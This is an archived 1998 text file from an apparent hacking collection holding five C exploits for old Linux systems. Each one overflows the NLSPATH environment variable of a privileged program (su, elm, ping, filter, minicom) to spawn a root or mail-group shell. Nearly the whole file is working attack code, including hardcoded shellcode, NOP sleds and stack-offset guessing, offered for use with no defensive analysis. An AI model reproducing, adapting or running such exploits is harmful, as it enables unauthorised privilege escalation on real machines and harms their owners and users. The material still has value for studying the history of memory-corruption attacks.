home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Hacking & Misc
/
bundle of exploits.sit
/
bundle of exploits
/
nlspath.txt
< prev
next >
Wrap
Text File
|
1998-07-17
|
5KB
|
243 lines
======================================================================
/*
* NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
* Copyright (c) 1997 by Solar Designer
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3072;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/su", "/bin/su", NULL);
}
=====================================================================
/*
Linux elm exploit. Gives effective group id of mail.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main(argc, argv)
unsigned int argc;
char **argv;
{
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3300 ;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/usr/bin/elm", "/usr/bin/elm", NULL);
}
====================================================================
/*
* ping-exploit (gives root via nlspath environment variable)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3029;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/ping", "/bin/ping", NULL);
}
=======================================================================
/*
* Exploit for /usr/bin/filter - get egid of mail
* Usage: cc -o f f.c
* ./f 750
* $ id
* uid=501(foo) gid=100(users) egid=12(mail)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main(int argc, char **argv)
{
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - atoi(argv[1]);
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/usr/bin/filter", "filter", NULL);
}
=====================================================================
/* Minicom Exploit by _PHANTOM_ */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define path "/usr/bin/minicom"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
setenv("NLSPATH",buff,1);
execl(path, "minicom", buff, NULL);
}
========================================================================================